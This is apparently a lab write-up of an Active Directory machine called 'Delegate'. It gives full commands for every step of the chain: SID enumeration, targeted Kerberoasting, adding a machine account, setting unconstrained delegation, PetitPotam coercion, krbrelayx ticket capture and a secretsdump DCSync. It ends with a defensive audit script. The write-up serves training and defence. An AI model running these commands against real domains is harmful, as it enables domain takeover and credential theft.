Delegate is a medium-rated machine. It consisted of enumerating SMB shares to find the credentials of a user with GenericWrite over another user object, which was abused through Targeted Kerberoasting; that second user held the SeEnableDelegation privilege, which led to Unconstrained Delegation and finally to a DCSync.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec
135/tcp open msrpc Microsoft Windows RPC
139/tcp open tcpwrapped
445/tcp open tcpwrapped
464/tcp open tcpwrapped
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=DC1.delegate.vl
| Issuer: commonName=DC1.delegate.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-09-30T15:47:02
| Not valid after: 2024-03-31T15:47:02
| MD5: 3a340b861cd985281f509d995bef9f4a
|_SHA-1: ccc740dd30a643bfc26e0b7f5d018da28d7e1630
5985/tcp open
Enumerating SMB as an anonymous user doesn't show any interesting shares. We can, however, enumerate domain users with lookupsid using the guest account, by brute-forcing SIDs:
lookupsid.py guest@delegate.vl 10000
Having the domain users, we can check whether any account has Kerberos pre-authentication disabled, which would allow AS-REP roasting.
Going back to the shares and accessing SYSVOL, we find a users.bat file containing a password.
Spraying this password against the users we have confirms that it belongs to A.Briggs.
Running python-bloodhound to enumerate the domain:
python3 bloodhound.py -d 'delegate.vl' -u 'A.Briggs' -p 'P4ssw0rd1#123' -c all -ns 10.10.70.255
From BloodHound we can see that A.Briggs has GenericWrite on N.Thompson. This can be abused either through Shadow Credentials or by associating an SPN with N.Thompson for Targeted Kerberoasting. I tried to add shadow credentials by editing msDS-KeyCredentialLink, but due to PKINIT not being supported by the DC it didn't work.
Attempting to perform targeted kerberoasting:
python3 /opt/targetedKerberoast/targetedKerberoast.py -u 'A.Briggs' -p 'P4ssw0rd1#123' --request-user N.Thompson -d 'delegate.vl'
Cracking the hash with hashcat gives N.Thompson's password.
Since N.Thompson has CanPSRemote, we can log in through WinRM.
This user belongs to Delegation Admins, but BloodHound showed no ACLs for that group.
Checking the privileges of this user shows that it has SeEnableDelegationPrivilege enabled.
This means we can abuse unconstrained delegation by creating a machine account and appending an SPN to it. Before that, we need to make sure the machine account quota isn't 0.
First, creating a machine account with addcomputer.py:
addcomputer.py -dc-ip 10.10.70.255 -computer-pass TestPassword321 -computer-name UwU delegate.vl/N.Thompson:'KALEB_2341'
Adding a DNS record for the machine account we created:
python3 dnstool.py -u 'delegate.vl\UwU$' -p TestPassword321 -r UwU.delegate.vl -d 10.8.0.136 --action add DC1.delegate.vl -dns-ip 10.10.70.255
To abuse unconstrained delegation, the machine account needs an SPN and the TRUSTED_FOR_DELEGATION UAC flag. Using bloodyAD we can add the UAC flag:
python3 /opt/bloodyAD/bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION
Appending the SPN with addspn via msDS-AdditionalDnsHostName:
python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.85.247 DC1.delegate.vl --additional
Now we run krbrelayx, first coercing authentication (using any PoC, e.g. PetitPotam, PrinterBug or DFSCoerce) from DC1 to the machine account we added with unconstrained delegation enabled. Because the account is trusted for unconstrained delegation, DC1 sends a copy of its TGT along with the authentication (the ticket that would normally be held in the machine's memory for accessing resources on the caller's behalf); krbrelayx captures that ticket, and it can be abused to perform a DCSync.
python3 PetitPotam.py -u 'UwU$' -p 'TestPassword321' UwU.delegate.vl 10.10.85.247
python3 ./krbrelayx.py -hashes :C7BE3644A2EB37C9BB1F248E9E0B9AFC
Having the ticket, we can export it and perform a DCSync to dump the domain hashes with secretsdump:
secretsdump.py 'DC1$'@DC1.delegate.vl -k -no-pass
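As an added, defender-side example (not from the write-up or any tool it uses), the following script audits the conditions this chain depends on: a non-zero machine account quota, TRUSTED_FOR_DELEGATION set on a non-DC account, msDS-AdditionalDnsHostName populated, a user account carrying an SPN, and pre-authentication disabled. The records and quota are constructed sample values modelled on the accounts above; in practice they would come from an LDAP query.

```python
from typing import Dict, List, Tuple

# Well-known userAccountControl bits (only the ones this audit needs)
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",            # set on domain controllers
    0x80000: "TRUSTED_FOR_DELEGATION",         # unconstrained delegation
    0x400000: "DONT_REQ_PREAUTH",              # AS-REP roastable
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

def decode_uac(value: int) -> List[str]:
    """Return the names of the known userAccountControl bits set in value."""
    return [name for bit, name in UAC_FLAGS.items() if value & bit]

def audit(records: List[Dict], machine_account_quota: int) -> List[Tuple[str, str]]:
    """Flag the conditions the delegation chain relies on; returns (account, finding) pairs."""
    findings = []
    if machine_account_quota > 0:
        findings.append(("domain", "ms-DS-MachineAccountQuota > 0: any user can add computers"))
    for r in records:
        name, flags = r["sAMAccountName"], decode_uac(r["userAccountControl"])
        # DCs legitimately carry TRUSTED_FOR_DELEGATION; anything else is suspicious
        if "TRUSTED_FOR_DELEGATION" in flags and "SERVER_TRUST_ACCOUNT" not in flags:
            findings.append((name, "unconstrained delegation on a non-DC account"))
        if r.get("msDS-AdditionalDnsHostName"):
            findings.append((name, "msDS-AdditionalDnsHostName set: extra host SPNs registered"))
        if "DONT_REQ_PREAUTH" in flags:
            findings.append((name, "Kerberos pre-authentication disabled"))
        if "NORMAL_ACCOUNT" in flags and r.get("servicePrincipalName"):
            findings.append((name, "user account carries an SPN: kerberoastable"))
    return findings

# Constructed sample records (hypothetical values, modelled on the accounts in this write-up)
SAMPLE = [
    {"sAMAccountName": "DC1$", "userAccountControl": 0x82000},
    {"sAMAccountName": "UwU$", "userAccountControl": 0x81000,
     "msDS-AdditionalDnsHostName": ["UwU.delegate.vl"],
     "servicePrincipalName": ["cifs/UwU.delegate.vl"]},
    {"sAMAccountName": "N.Thompson", "userAccountControl": 0x10200,
     "servicePrincipalName": ["fake/roast"]},
    {"sAMAccountName": "svc_legacy", "userAccountControl": 0x410200},
]

if __name__ == "__main__":
    for account, finding in audit(SAMPLE, machine_account_quota=10):
        print(f"{account:12} {finding}")
```

The same checks map onto change monitoring: an alert on userAccountControl gaining 0x80000 or on msDS-AdditionalDnsHostName being written to a freshly created computer object would have caught each step above.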
References
- https://www.thehacker.recipes/a-d/movement/dacl/targeted-kerberoasting
- https://exploit.ph/user-constrained-delegation.html
- https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
- https://github.com/CravateRouge/bloodyAD
- https://medium.com/r3d-buck3t/attacking-kerberos-unconstrained-delegation-ef77e1fb7203